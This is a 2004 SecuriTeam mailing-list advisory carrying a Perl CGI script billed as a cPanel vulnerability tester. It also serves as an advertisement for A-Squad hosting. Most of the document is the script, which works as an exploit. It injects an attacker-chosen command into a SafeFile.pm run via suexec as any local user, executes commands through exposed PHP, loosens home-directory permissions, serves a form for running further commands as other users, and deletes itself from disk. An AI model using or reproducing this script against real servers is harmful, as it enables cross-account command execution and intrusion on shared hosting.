[TOOL] cPanel Multiple Vulnerabilities Testing Script

From: SecuriTeam (support_at_securiteam.com)
Date: 05/24/04

Next message: SecuriTeam: "[UNIX] cPanel mod_phpsuexec Vulnerability"

Previous message: SecuriTeam: "[NEWS] Liferay Cross Site Scripting Flaw"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 24 May 2004 20:05:01 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

cPanel Multiple Vulnerabilities Testing Script
------------------------------------------------------------------------

SUMMARY

DETAILS

A-Squad has built a simple to use perl scan that can be used by
administrators to verify whether their cPanel system is vulnerable to
multiple points of attack.

Testing Script:
#!/usr/bin/perl -w
# PROGRAM: tests.pl
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com

use strict;
use CGI ':standard';

if (my $query = shift) {
$ENV{QUERY_STRING} = $query;
$ENV{REQUEST_METHOD}="GET";
}
my $q = new CGI;

my @users = ();
my $me = "";
my $default_command = "id -a";
my $dummy = "/tmp/tests";

$| = 1;
print start_html("System Check");

my $action = "cpanel.php";
my $secure = 1;
my $locked = 1;
my $common = 0;
my $cpanel = 0;
my $canexe = 0;

print qq{<center><a href=http://www.a-squad.com/><img
src=http://www.a-squad.com/Abanner.jpg border=0 alt="ADVERTISEMENT:
A-Squad Certified Secure cPanel Hosting"></a></center>\n};
print "<ol>Performing white box security audit...\n";
if (-d "/usr/local/cpanel") {
 chomp($cpanel = `/usr/local/cpanel/cpanel -V`);
 print "<li>PASSED: cPanel INSTALLED
($cpanel)\n";
} else {
 print "<li>FAILED: cPanel NOT INSTALLED\n";
 print "<a
href=http://www.a-squad.com/audit/explain1.html>Explain</a>\n";
}

my $uid = $<;
if ($uid < 500) {
 print "<li>FAILED: Privileged UID Vulnerability
Check ($uid)\n";
 print "<a
href=http://www.a-squad.com/audit/explain2.html>Explain</a>\n";
 my $nam = getpwuid $uid;
 if ($nam eq "nobody") {
 print "<li>FAILED: nobody execution\n";
 print "<a
href=http://www.a-squad.com/audit/explain3.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: User $nam ($uid) is
probably not shared\n";
 }
 $common = 1;
} else {
 print "<li>PASSED: Privileged UID Vulnerability
Check ($uid)\n";
}

setpwent;
while (my ($name,$passwd,$uid,$gid,
           $quota,$comment,$gcos,$dir) = getpwent) {
  if ($uid >= 500) {
    push @users, $name;
    if ($ENV{PWD} =~ m%^\Q$dir\E/%) {
      $me = $name;
      $ENV{HOME} = $dir;
    }
  }
}

if ($me && $ENV{HOME} &&
 -d $ENV{HOME}) {
 my $mode = (stat _)[2];
 if ($mode & 1) {
 print "<li>FAILED: Stealth Snoop Vulnerability
[$ENV{HOME}]\n";
 print "<a
href=http://www.a-squad.com/audit/explain4.html>Explain</a>\n";
 $secure = 0;
 $locked = 0;
 } else {
 print "<li>PASSED: Stealth Snoop
Vulnerability [$ENV{HOME}]\n";
 }
 if ($mode & 4) {
 print "<li>FAILED: Simple \$HOME Scanning
[$ENV{HOME}]\n";
 print "<a
href=http://www.a-squad.com/audit/explain5.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Simple \$HOME Scanning
[$ENV{HOME}]\n";
 }
 if ($mode & 32) {
 print "<li>FAILED: Group \$HOME Scanning
[$ENV{HOME}]\n";
 print "<a
href=http://www.a-squad.com/audit/explain6.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Group \$HOME Scanning
[$ENV{HOME}]\n";
 }
 $mode = (stat "$ENV{HOME}/..")[2];
 if ($mode & 4) {
 print "<li>FAILED: Root /home scanning\n";
 print "<a
href=http://www.a-squad.com/audit/explain11.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Root /home scanning\n";
 }
 $mode = (stat "$ENV{HOME}/public_html")[2];
 if (!$locked && $mode & 1) {
 print "<li>FAILED: Simple WEBROOT
Protection\n";
 print "<a
href=http://www.a-squad.com/audit/explain7.html>Explain</a>\n";
 } else {
 print "<li>PASSED: Simple WEBROOT
Protection\n";
 }
 my $pubg = (stat _)[5];
 if ($common && !$locked and
 ($(==$pubg && ($mode & 8)) ||
 ($mode & 1)) {
 print "<li>FAILED: Real WEBROOT Protection\n";
 print "<a
href=http://www.a-squad.com/audit/explain8.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Real WEBROOT
Protection\n";
 }
} else {
 print "<li>FAILED: Unable to locate unprivileged
homedir\n";
}

my $command = $q->param("command") || $default_command;
my $who = $q->param("username") || $me;
if ($cpanel && $common) {
 if ($command and $who) {
 mkdir $dummy, 0755;
 chdir $dummy;
 symlink("/usr/local/cpanel","cpanel");
 my $dir = (getpwnam $who)[7];
 open (DUMMY,">SafeFile.pm");
 $ENV{HOME} = $dir;
 print DUMMY qq{chdir "$dir";warn "\n";\nexec
<<RUN$$;\n$command\nRUN$$\n};
 close DUMMY;
 my $out = `/usr/local/apache/bin/suexec $who $who
cpanel/bin/proftpdvhosts 2>&1`;
 chdir "/var/tmp";
 system("rm","-rf",$dummy);
 if ($out) {
 print "<li>FAILED: SUEXEC
<code>mod_php</code> Exploit Test\n";
 print "<a
href=http://www.a-squad.com/audit/explain9.html>Explain</a>\n";
 print "<pre>EXEC [$command] as [$who]:\n";
 $out =~ s/&/&/g;
 $out =~ s/</</g;
 print $out,"</pre>\n";
 $canexe = 1;
 } else {
 print "<li>PASSED: SUEXEC
<code>mod_php</code> Exploit Test\n";
 }
 }
} elsif ($cpanel && !$common) {
 my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php
SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php 2>&1`;
 if ($probe =~ /phpinfo/) {
 print "<li>FAILED: SUEXEC
<code>mod_phpsuexec</code> Exploit Test\n";
 print "<a
href=http://www.a-squad.com/audit/explain10.html>Explain</a>\n";
 $canexe = 1;
 $secure = 0;
 print "<pre>EXEC [$command] as [$who]:\n";
 my $out = `$command 2>&1`;
 $out =~ s/&/&/g;
 $out =~ s/</</g;
 print $out,"</pre>\n";
 if ($who ne $me) {
 print "Submit again to switch to another user... \n";
 my @guess = qw(/index.php /forum/index.php /forums/index.php);
 my $rand = $guess[rand @guess];
 $action = "/~$who$rand/~$me/cpanel.php";
 system "chmod o+x $ENV{HOME}";
 }
 } else {
 print "<li>PASSED: SUEXEC
<code>mod_phpsuexec</code> Exploit Test\n";
 }
}
if ($cpanel) {
 if ($secure) {
 print "<li>PASSED: Congratulations, your
cPanel configuration is secure!\n";
 } else {
 print "<li>FAILED: One or more insecure cPanel
configurations were detected. Visit <a
href=http://www.a-squad.com/>A-Squad.Com</a> for details on where to find
more secure cPanel hosting.\n";
 }
}
print "</ol>";
print
 start_form(-method => "GET",-action => $action,-name=>"f"),
 "Username: ",
 popup_menu
 (-name => "username",
 -values => [ sort @users ],
 -default => $who,
 ),
 br,
 "Password: (not required)",br,
 "Command: ",
 textfield(-name => "command",-value=> $command),
 br,
 submit(-value=> "Test Execution"),
 end_form,
 "\n<script>f.command.focus()</script>\n"
 if $canexe;
print end_html;
-M$0>0.01&&unlink$0;

ADDITIONAL INFORMATION

The information has been provided by <mailto:rob@asquad.com> Rob Brown.

The original article can be found at: <http://www.a-squad.com/audit/>
http://www.a-squad.com/audit/

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[UNIX] cPanel mod_phpsuexec Vulnerability"

Previous message: SecuriTeam: "[NEWS] Liferay Cross Site Scripting Flaw"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[UNIX] Multiple Cross-Site Scripting Vulnerabilities In cPanel
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... through WebHost Manager, and an end user interface through cPanel, every ... browser using the trust relationship between the browser and the server. ...
(Securiteam)
[UNIX] cPanel mod_phpsuexec Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The options used by cPanel ... user owning a web accessible PHP file. ... vulnerability and it has been repaired. ...
(Securiteam)
[UNIX] cPanel Local Privilege Escalation
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A file execution precedence vulnerability in cPanel allows local privilege ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
[NT] CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow ... Remote exploitation of multiple buffer overflow vulnerabilities in ... rxsGetSubDirs, rxsGetServerDBPathName, rxsSetServerOptions, rxsDeleteFile, ...
(Securiteam)
[NT] Novell eDirectory Multiple Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Novell eDirectory Multiple Vulnerabilities ... Three different vulnerabilities were discovered in Novell's eDirectory ... NCP over IP length Heap Overflow: ...
(Securiteam)